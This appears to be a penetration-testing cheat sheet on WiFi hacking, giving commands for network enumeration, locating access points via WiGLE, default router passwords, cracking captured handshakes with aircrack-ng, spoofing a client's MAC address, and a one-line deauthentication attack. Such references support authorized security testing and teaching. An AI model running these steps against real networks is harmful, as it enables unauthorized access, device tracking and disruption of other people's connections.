icon

WiFi Hacking

Last modified: 2024-12-18

Enumeration

# IP addresses
ip addr
# specific interface
ip addr show eth0
ip addr show eth1
ip addr show tun0
# IPv4/6 only
ip -4 addr
ip -6 addr
# Static route
ip route

# Get the currently connected WiFi router's IP address (see the 'Default gateway' line in the output)
ipconfig

# Find any wireless devices
iw dev
# Display information of the specified device
iw dev <interface> info
# Scan wifi networks nearby the specified device
iw dev <interface> scan

# Find another computer's IP address/MAC address on the network
arp -av

# Get public IP address
curl https://api.ipify.org

Using WiGLE

If BSSIDs found, we can find the location for devices using WiGLE.

To find BSSID From SSID using WiGLE:

  1. Access to WiGLE and login.
  2. Go to View → Advanced Search.
  3. Open the General Search tab.
  4. Input the SSID in the SSID/Network Name.
  5. Check the result.

Delete Network Interfaces From Your Devices

ip link delete <iterface>

Crack WiFi Passwords

Default Router Credentials

admin:Admin
admin:admin
admin:password
admin:Michelangelo
root:admin
root:alpine
sitecom:Admin
telco:telco

Crack from A Packet Capture File

If we have a packet capture file (.cap or .pcap) of the WiFi network, we can crack the WiFi password using the file.

aircrack-ng example.cap -w wordlist.txt

MAC Address Spoofing

First of all, you need to use network adapter which has monitor mode on your machine.
Aircrack-ng is a complete suite of tools to assess WiFi network security.

  1. Preparation

    # Show available interfaces
    airmon-ng
    
    # Put an interface into monitor mode
    airmon-ng start wlan0
    airmon-ng start eth0
    # or
    iwconfig wlan0 mode monitor
    iwconfig eth0 mode monitor
    
    # Choose the access point (monitor mode)
    airodump-ng wlan0mon
    
  2. Retrieve Client's MAC Addresses

    # Retrieve client's MAC address from the chosen access point
    # -c 9: channel 9
    # --bssid: target router MAC address
    # -w psk: the dump file prefix
    # eth0: interface name
    airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -i wlan0mon
    airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk eth0
    
  3. Spoof MAC Address using the Retrieved Address

    # Take down the network at first
    ip link set wlan0 down
    
    # Set MAC address which you got by airodump-ng in the previous section
    macchanger -m XX:XX:XX:XX:XX:XX wlan0
    
    # Bring up the network
    ip link set wlan0 up
    
  4. Confirmation

    # Check the current MAC address
    macchanger -s wlan0
    
  5. Reset to the Original MAC Address

    # Reset to the original (permanent) MAC address
    macchanger -p wlan0
    

Deauthentication Attack

Reference: https://medium.com/@flytechoriginal/state-of-wifi-security-in-2024-b88091015cc2

Using (Freeway)[https://github.com/FLOCK4H/Freeway], we can easily achieve this attack.

sudo Freeway -i wlan1 -a deauth

Other Useful Tools

  • Bettercap

    The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.

  • OUI Standards

    List of MAC OUI (Organizationally Unique Identifier). You can get the information from the BSSID.

    • Access to the OUI Standards

      If the target BSSID is "B4:5D:50:AA:86:41", search text by inputting "B4-5D-50" on the string search.
      Then check the information.